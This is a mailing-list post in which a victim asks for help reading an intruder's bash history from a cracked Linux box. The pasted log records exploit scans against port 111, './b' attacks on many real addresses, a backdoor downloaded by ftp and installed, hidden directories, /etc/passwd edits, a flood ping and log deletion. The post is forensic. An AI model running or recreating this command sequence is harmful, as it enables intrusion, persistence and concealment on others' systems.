[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

bash_history from Cracked Computer

Can someone help me figure out this "/.bash_history" from my
computer that someone cracked into and did some damage.
 
I'll probably re-install the box, but I'd like to see what they did
before I destroy it.  I've attached the "/.bash_history".
 
Dzuy
w
ifconfig
ls -la
logout
exit
id
who
ping yahoo.com
who
finger
uname -a
ls -la
cd /
ls
cd root
ls
logout
exit
w
traceroute 193.254.35.18
 home
cd .dead
cd home
cd .dead
ls
mkdir.dead
mkdir .dead
cd .dead
cc anatomy.c -o anatomy
cc kod.c -o kofd
cp kofd kod
rm kofd
./anatomy 216.209.196.154 22
./anatomy 216.209.205.68 22
./anatomy 216.209.207.150 22
cd home
cd .dead
who
ls
tar -zxvf bnc2_6_4_tar.gz
cd bnc2.6.4
./configure
make
ls
make install
make
cd home
cd httpd
cd icons
cd small
cd .shit
mkdir small
cd small
mkdir .shit
cd .shit
who
chmod 777 *
chmod +s *
chmod 666 *
chmod 777 *
./pscan
./b
./pscan 167.64 111
                                                                                                                                                        
./pscan 206.252 111
cat wuftp.lo
cat wuftp.log
./b 206.252.255.42
./pscan 198.138 111
cat wuftp.log
rm wuftp.log
./pscan 198.59 111
cat wuftp.log
./b 198.59.112.9
./b 198.59.115.35
./b 198.59.173.186
./b 198.59.169.11
exit
cd home
cd .dead
cd home
cd httopd
cd icons
cd httpd
cd iocns
cd icons
cd small
cd .shit
./b www.telesync.com
rm wuftp.log
./b www.cqhost.com
./pscan 195.54 111
cd home
cd httpd
cd icons
cd small
cd .shit
cat wuftp.log
./b 195.54.2.162
rm wuftp.log
./pscan 195.54
./pscan 195.54 111
cat wuftp.log
./b 195.54.3.134
./b 195.54.29.7
./b 195.54.221.21
rm wuftp.log
./b 206.132.34.52
./pscan 206.132 111
cat wuftp.log
./b 206.132.219.119
./b 206.132.219.170
rm wuftp.log
./pscan 209.0 111
cd home
cd .dead
cd ..
cd httpd
cd icons
cd small
cd .shit
cat wuftp.log
ping -f newsforlinux.com
cd home
cd httpd
cd icons
cd small
cd .shit
cd home
cd httpd
cd icons
cd small
cd .shit
./pscan 216.122 111
d home
cd home
cd httpd
cd icons
cd small
cd .shit
cat wuftp.log
./pscan 193.86 111
cat wuftp.log
rm wuftp.log
./b 143.232.55.1
./pscan 143.232 111
cd home
cd httpd
cd icons
cd small
cd .shit
./pscan 128.61 111
who
cd home
cd httpd
c dicons
cd small
cd .shit
cd icons
cd samll
cd .shit
cd small
cd .shit
./b 194.83.100.85
./pscan 194.83 111
cat wuftp.log
./b 203.15.123.146
./pscan 192.20 111
cd home
cd httpd
cd icons
cd small
cd ,.shit
cd .shit
./b e150.135.112.129
./b 150.135.112.129
d home
cd home
cd httpd
cd icons
cd small
cd shit
cd .shit
ls
cat wuftp.log
./b 139.78.100.200
./pscan 139.78 111
cd home
cd httpd
cd icons
cd small
cd .shit
who
exit
cd home
cd httpd
cd icons
cd small
cd .shit
who
cat wuftp.log
./b 216.156.219.216
./b 199.109.4.21
./pscan 199.109 111
./pscan 172.16 111
./pscan 192.55 111
cat wuftp.log
./b 192.55.203.135
rm wuftp.log
./pscan 129.98 111
./pscan 192.153 111
cat wuftp.log
./pscan 134.241 111
./b 142.169.8.215
cat wuftp.log
./pscan 204.116 111
cat wuftp.log
./b 204.116.30.166
./b 204.116.104.205
./b 204.116.202.5
rm wuftp.log
./pscan 192.203 111
cat wuftp.log
./b 192.203.80.149
./b 192.203.80.144
./b 192.203.80.142
./b 192.203.130.28
rm wuftp.log
./pscan 199.17 111
cat wuftp.log
./pscan 208.7 111
cat wuftp.log
./pscan 137.165 111
./pscan 209.56 111
cat wuftp.log
./pscan 204.185 111
cat wuftp.log
./b 204.185.56.250
./b 204.185.91.12
rm wuftp.log
./pscan 205.238 111
cat wuftp.log
./b 205.238.205.10
./b 205.238.238.112
rm wuftp.log
./pscan 156.26 111
cat wuftp.log
./b 156.26.120.34
rm wuftp.log
./pscan 206.243 111
cat wuftp.log
./pscan 192.204 111
cat wuftp.log
./pscan 140.211 111
cat wuftp.log
./pscan 192.207 111
cat wuftp.log
exit
ftp columbia.digiweb.com
tar -zxvf linux.tar.gz
cd .bd
./install
cd home
cd httpd
cd icons
cd msla
cd small
cd .shit
rm wuftp.log
./pscan 161.6 111
cat wuftp.log
./pscan 152.30 111
cat wuftp.log
./pscan 208.31 111
cat wuftp.log
./pscan 129.133 111
cat wuftp.log
./pscan 149.130 111
cat wuftp.log
./pscan 199.234 111
cat wuftp.log
./pscan 208.135 111
cat wuftp.log
./b 208.135.205.67
rm wuftp.log
./pscan 204.171 111
cat wuftp.log
./pscan 198.247 111
cat wuftp.log
./b 198.247.5.164
./pscan 199.199 111
cat wuftp.log
rm wuftp.log
./pscan 198.150 111
cat wuftp.log
./b 198.150.93.205
telnet 198.150.93.205
rm wuftp.log
./pscan 150.174 111
./pscan 208.27 111
cat wuftp.log
uname -a
cat /etc/passwd
pico /ec/passwd
cd /home
ls -a
cd ..
ls -a
car .bash_history
cat .bash_history
passwd z
cat /etc/passwd
cd home
cd httpd
cd icons
cd small
c d.shit
cd .shit
ls
cat wuftp.log
rm *.log
./pscan 155.42 111
uname -a
who
./anatomy 212.1.128.61 22
/home/.dead/anatomy 212.1.128.61 22
whoami
exit
Reply to: